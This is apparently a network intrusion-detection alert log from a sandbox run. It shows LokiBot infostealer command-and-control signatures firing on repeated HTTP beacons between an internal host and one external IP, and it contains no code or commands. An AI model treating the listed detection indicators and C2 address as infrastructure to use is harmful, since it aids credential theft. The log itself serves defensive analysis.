2024-09-25T15:29:20.658125+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55924	188.114.96.3	80	TCP
2024-09-25T15:29:21.877333+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55925	188.114.96.3	80	TCP
2024-09-25T15:29:22.966391+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55926	188.114.96.3	80	TCP
2024-09-25T15:29:23.928498+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55927	188.114.96.3	80	TCP
2024-09-25T15:29:24.921645+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55928	188.114.96.3	80	TCP
2024-09-25T15:29:27.055675+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55929	188.114.96.3	80	TCP
2024-09-25T15:29:27.870221+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55931	188.114.96.3	80	TCP
2024-09-25T15:29:28.942773+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55932	188.114.96.3	80	TCP
2024-09-25T15:29:29.777253+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55933	188.114.96.3	80	TCP
2024-09-25T15:29:30.591674+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55934	188.114.96.3	80	TCP
2024-09-25T15:29:31.906770+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55935	188.114.96.3	80	TCP
2024-09-25T15:29:32.797954+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55936	188.114.96.3	80	TCP
2024-09-25T15:29:33.663752+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55937	188.114.96.3	80	TCP
2024-09-25T15:29:34.519787+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55938	188.114.96.3	80	TCP
2024-09-25T15:29:35.353459+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55939	188.114.96.3	80	TCP
2024-09-25T15:29:36.192350+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55940	188.114.96.3	80	TCP
2024-09-25T15:29:37.117852+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55941	188.114.96.3	80	TCP
2024-09-25T15:29:38.099928+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55942	188.114.96.3	80	TCP
2024-09-25T15:29:39.059740+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55943	188.114.96.3	80	TCP
2024-09-25T15:29:39.928784+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55944	188.114.96.3	80	TCP
2024-09-25T15:29:40.808147+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55945	188.114.96.3	80	TCP
2024-09-25T15:29:41.638243+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55946	188.114.96.3	80	TCP
2024-09-25T15:29:42.475611+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55947	188.114.96.3	80	TCP
2024-09-25T15:29:43.324953+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55948	188.114.96.3	80	TCP
2024-09-25T15:29:44.263622+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55949	188.114.96.3	80	TCP
2024-09-25T15:29:45.374185+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55950	188.114.96.3	80	TCP
2024-09-25T15:29:46.306365+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55951	188.114.96.3	80	TCP
2024-09-25T15:29:47.360807+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55952	188.114.96.3	80	TCP
2024-09-25T15:29:48.414802+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55953	188.114.96.3	80	TCP
2024-09-25T15:29:49.677411+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55954	188.114.96.3	80	TCP
2024-09-25T15:29:50.524174+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55955	188.114.96.3	80	TCP
2024-09-25T15:29:51.428232+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55956	188.114.96.3	80	TCP
2024-09-25T15:29:52.541643+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55957	188.114.96.3	80	TCP
2024-09-25T15:29:53.383135+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55958	188.114.96.3	80	TCP
2024-09-25T15:29:54.258505+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55959	188.114.96.3	80	TCP
2024-09-25T15:29:55.425796+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55960	188.114.96.3	80	TCP
2024-09-25T15:29:56.224619+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55961	188.114.96.3	80	TCP
2024-09-25T15:29:57.052272+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55962	188.114.96.3	80	TCP
2024-09-25T15:29:58.164945+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55963	188.114.96.3	80	TCP
2024-09-25T15:29:58.987927+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55964	188.114.96.3	80	TCP
2024-09-25T15:29:59.835835+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55965	188.114.96.3	80	TCP
2024-09-25T15:30:00.716018+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55966	188.114.96.3	80	TCP
2024-09-25T15:30:01.920768+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55967	188.114.96.3	80	TCP
2024-09-25T15:30:02.761283+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55968	188.114.96.3	80	TCP
2024-09-25T15:30:03.946516+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55969	188.114.96.3	80	TCP
2024-09-25T15:30:05.226430+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55970	188.114.96.3	80	TCP
2024-09-25T15:30:06.440249+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55971	188.114.96.3	80	TCP
2024-09-25T15:30:07.613698+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55972	188.114.96.3	80	TCP
2024-09-25T15:30:08.520224+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55973	188.114.96.3	80	TCP
2024-09-25T15:30:09.339418+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55974	188.114.96.3	80	TCP
2024-09-25T15:30:10.220925+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55975	188.114.96.3	80	TCP
2024-09-25T15:30:11.026164+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55976	188.114.96.3	80	TCP
2024-09-25T15:30:12.218161+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55977	188.114.96.3	80	TCP
2024-09-25T15:30:13.173782+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55978	188.114.96.3	80	TCP
2024-09-25T15:30:13.993423+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55979	188.114.96.3	80	TCP
2024-09-25T15:30:14.842547+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55980	188.114.96.3	80	TCP
2024-09-25T15:30:15.691270+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55981	188.114.96.3	80	TCP
2024-09-25T15:30:16.551798+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55982	188.114.96.3	80	TCP
2024-09-25T15:30:17.497860+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55983	188.114.96.3	80	TCP
2024-09-25T15:30:18.363198+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55984	188.114.96.3	80	TCP
2024-09-25T15:30:19.199856+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55985	188.114.96.3	80	TCP
2024-09-25T15:30:20.095708+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55986	188.114.96.3	80	TCP
2024-09-25T15:30:21.507011+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55987	188.114.96.3	80	TCP
2024-09-25T15:30:23.134473+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55988	188.114.96.3	80	TCP
2024-09-25T15:30:24.350366+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55989	188.114.96.3	80	TCP
2024-09-25T15:30:25.290428+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55990	188.114.96.3	80	TCP
2024-09-25T15:30:26.169979+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55991	188.114.96.3	80	TCP
2024-09-25T15:30:27.001129+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55992	188.114.96.3	80	TCP
2024-09-25T15:30:27.899264+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55993	188.114.96.3	80	TCP
2024-09-25T15:30:28.753857+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55994	188.114.96.3	80	TCP
2024-09-25T15:30:29.618078+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55995	188.114.96.3	80	TCP
2024-09-25T15:30:30.428677+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55996	188.114.96.3	80	TCP
2024-09-25T15:30:31.273028+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55997	188.114.96.3	80	TCP
2024-09-25T15:30:32.135559+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55998	188.114.96.3	80	TCP
2024-09-25T15:30:33.256022+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55999	188.114.96.3	80	TCP
2024-09-25T15:30:34.073488+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	56000	188.114.96.3	80	TCP
2024-09-25T15:30:35.801198+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	56001	188.114.96.3	80	TCP
2024-09-25T15:30:37.771542+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	56002	188.114.96.3	80	TCP
2024-09-25T15:30:38.713862+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	56003	188.114.96.3	80	TCP
2024-09-25T15:30:39.594556+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	56004	188.114.96.3	80	TCP
2024-09-25T15:30:40.433961+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	56005	188.114.96.3	80	TCP
2024-09-25T15:30:41.413983+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	56006	188.114.96.3	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T15:28:34.491221+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	56006	TCP
2024-09-25T15:28:39.246004+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49732	TCP
2024-09-25T15:28:40.181088+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49733	TCP
2024-09-25T15:28:41.118035+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49734	TCP
2024-09-25T15:28:41.995245+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49735	TCP
2024-09-25T15:28:42.850104+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49736	TCP
2024-09-25T15:28:43.875473+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49737	TCP
2024-09-25T15:28:44.712136+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49738	TCP
2024-09-25T15:28:45.631218+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49739	TCP
2024-09-25T15:28:46.440257+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49740	TCP
2024-09-25T15:28:47.278219+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49741	TCP
2024-09-25T15:28:48.165787+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49743	TCP
2024-09-25T15:28:49.044212+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49745	TCP
2024-09-25T15:28:49.983395+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49747	TCP
2024-09-25T15:28:50.956867+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	49749	TCP
2024-09-25T15:28:51.835887+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55890	TCP
2024-09-25T15:28:52.736496+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55892	TCP
2024-09-25T15:28:53.555610+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55893	TCP
2024-09-25T15:28:54.384675+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55894	TCP
2024-09-25T15:28:55.235087+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55895	TCP
2024-09-25T15:28:56.268225+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55896	TCP
2024-09-25T15:28:57.196981+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55897	TCP
2024-09-25T15:28:58.326273+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55898	TCP
2024-09-25T15:28:59.176151+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55899	TCP
2024-09-25T15:29:00.305746+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55900	TCP
2024-09-25T15:29:01.207280+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55901	TCP
2024-09-25T15:29:02.090433+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55902	TCP
2024-09-25T15:29:03.028345+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55903	TCP
2024-09-25T15:29:03.941766+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55904	TCP
2024-09-25T15:29:04.762456+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55905	TCP
2024-09-25T15:29:05.579762+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55906	TCP
2024-09-25T15:29:06.431327+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55907	TCP
2024-09-25T15:29:07.275362+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55908	TCP
2024-09-25T15:29:08.160820+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55909	TCP
2024-09-25T15:29:09.008486+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55910	TCP
2024-09-25T15:29:09.877822+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55911	TCP
2024-09-25T15:29:10.733142+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55912	TCP
2024-09-25T15:29:11.588290+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55913	TCP
2024-09-25T15:29:12.450993+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55914	TCP
2024-09-25T15:29:13.333492+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55915	TCP
2024-09-25T15:29:14.289431+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55916	TCP
2024-09-25T15:29:15.172021+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55917	TCP
2024-09-25T15:29:16.087444+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55918	TCP
2024-09-25T15:29:17.074546+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55919	TCP
2024-09-25T15:29:17.932139+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55920	TCP
2024-09-25T15:29:18.786816+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55921	TCP
2024-09-25T15:29:19.614844+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55922	TCP
2024-09-25T15:29:20.501107+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55923	TCP
2024-09-25T15:29:21.691492+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55924	TCP
2024-09-25T15:29:22.680605+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55925	TCP
2024-09-25T15:29:23.758949+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55926	TCP
2024-09-25T15:29:24.760805+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55927	TCP
2024-09-25T15:29:26.883421+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55928	TCP
2024-09-25T15:29:27.715578+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55929	TCP
2024-09-25T15:29:28.631311+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55931	TCP
2024-09-25T15:29:29.620789+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55932	TCP
2024-09-25T15:29:30.436181+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55933	TCP
2024-09-25T15:29:31.579554+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55934	TCP
2024-09-25T15:29:32.628954+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55935	TCP
2024-09-25T15:29:33.513537+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55936	TCP
2024-09-25T15:29:34.373954+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55937	TCP
2024-09-25T15:29:35.198670+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55938	TCP
2024-09-25T15:29:36.047855+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55939	TCP
2024-09-25T15:29:36.935469+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55940	TCP
2024-09-25T15:29:37.932328+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55941	TCP
2024-09-25T15:29:38.895251+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55942	TCP
2024-09-25T15:29:39.772496+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55943	TCP
2024-09-25T15:29:40.659576+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55944	TCP
2024-09-25T15:29:41.476685+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55945	TCP
2024-09-25T15:29:42.310743+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55946	TCP
2024-09-25T15:29:43.167479+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55947	TCP
2024-09-25T15:29:44.101969+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55948	TCP
2024-09-25T15:29:45.061185+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55949	TCP
2024-09-25T15:29:46.152919+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55950	TCP
2024-09-25T15:29:47.191361+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55951	TCP
2024-09-25T15:29:48.244918+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55952	TCP
2024-09-25T15:29:49.520363+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55953	TCP
2024-09-25T15:29:50.349453+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55954	TCP
2024-09-25T15:29:51.280707+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55955	TCP
2024-09-25T15:29:52.202676+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55956	TCP
2024-09-25T15:29:53.234693+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55957	TCP
2024-09-25T15:29:54.106348+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55958	TCP
2024-09-25T15:29:54.976956+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55959	TCP
2024-09-25T15:29:56.069027+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55960	TCP
2024-09-25T15:29:56.906316+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55961	TCP
2024-09-25T15:29:57.741467+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55962	TCP
2024-09-25T15:29:58.847290+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55963	TCP
2024-09-25T15:29:59.674829+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55964	TCP
2024-09-25T15:30:00.564280+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55965	TCP
2024-09-25T15:30:01.632246+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55966	TCP
2024-09-25T15:30:02.601054+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55967	TCP
2024-09-25T15:30:03.528472+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55968	TCP
2024-09-25T15:30:05.073629+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55969	TCP
2024-09-25T15:30:06.059293+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55970	TCP
2024-09-25T15:30:07.466088+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55971	TCP
2024-09-25T15:30:08.379045+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55972	TCP
2024-09-25T15:30:09.189852+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55973	TCP
2024-09-25T15:30:10.056504+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55974	TCP
2024-09-25T15:30:10.866580+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55975	TCP
2024-09-25T15:30:12.057825+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55976	TCP
2024-09-25T15:30:12.928806+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55977	TCP
2024-09-25T15:30:13.843863+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55978	TCP
2024-09-25T15:30:14.670223+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55979	TCP
2024-09-25T15:30:15.531017+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55980	TCP
2024-09-25T15:30:16.357320+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55981	TCP
2024-09-25T15:30:17.335069+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55982	TCP
2024-09-25T15:30:18.196346+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55983	TCP
2024-09-25T15:30:19.044870+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55984	TCP
2024-09-25T15:30:19.932506+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55985	TCP
2024-09-25T15:30:21.361415+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55986	TCP
2024-09-25T15:30:22.977810+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55987	TCP
2024-09-25T15:30:24.173330+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55988	TCP
2024-09-25T15:30:25.139379+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55989	TCP
2024-09-25T15:30:26.014599+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55990	TCP
2024-09-25T15:30:26.836287+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55991	TCP
2024-09-25T15:30:27.742915+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55992	TCP
2024-09-25T15:30:28.613288+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55993	TCP
2024-09-25T15:30:29.447188+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55994	TCP
2024-09-25T15:30:30.276618+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55995	TCP
2024-09-25T15:30:31.126338+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55996	TCP
2024-09-25T15:30:31.987764+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55997	TCP
2024-09-25T15:30:32.896266+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55998	TCP
2024-09-25T15:30:33.921906+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	55999	TCP
2024-09-25T15:30:35.638685+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	56000	TCP
2024-09-25T15:30:36.517408+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	56001	TCP
2024-09-25T15:30:38.539438+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	56002	TCP
2024-09-25T15:30:39.450411+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	56003	TCP
2024-09-25T15:30:40.288333+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	56004	TCP
2024-09-25T15:30:41.175888+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.4	56005	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T15:28:39.241108+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49732	188.114.96.3	80	TCP
2024-09-25T15:28:40.175614+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49733	188.114.96.3	80	TCP
2024-09-25T15:28:41.113236+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49734	188.114.96.3	80	TCP
2024-09-25T15:28:41.990383+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49735	188.114.96.3	80	TCP
2024-09-25T15:28:42.845238+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49736	188.114.96.3	80	TCP
2024-09-25T15:28:43.869838+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49737	188.114.96.3	80	TCP
2024-09-25T15:28:44.707278+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49738	188.114.96.3	80	TCP
2024-09-25T15:28:45.626258+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49739	188.114.96.3	80	TCP
2024-09-25T15:28:46.435201+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49740	188.114.96.3	80	TCP
2024-09-25T15:28:47.272281+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49741	188.114.96.3	80	TCP
2024-09-25T15:28:48.160931+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49743	188.114.96.3	80	TCP
2024-09-25T15:28:49.039252+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49745	188.114.96.3	80	TCP
2024-09-25T15:28:49.978517+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49747	188.114.96.3	80	TCP
2024-09-25T15:28:50.952046+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49749	188.114.96.3	80	TCP
2024-09-25T15:28:51.830924+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55890	188.114.96.3	80	TCP
2024-09-25T15:28:52.731636+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55892	188.114.96.3	80	TCP
2024-09-25T15:28:53.550696+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55893	188.114.96.3	80	TCP
2024-09-25T15:28:54.379847+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55894	188.114.96.3	80	TCP
2024-09-25T15:28:55.230197+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55895	188.114.96.3	80	TCP
2024-09-25T15:28:56.263321+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55896	188.114.96.3	80	TCP
2024-09-25T15:28:57.191920+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55897	188.114.96.3	80	TCP
2024-09-25T15:28:58.321400+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55898	188.114.96.3	80	TCP
2024-09-25T15:28:59.169488+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55899	188.114.96.3	80	TCP
2024-09-25T15:29:00.300722+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55900	188.114.96.3	80	TCP
2024-09-25T15:29:01.202417+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55901	188.114.96.3	80	TCP
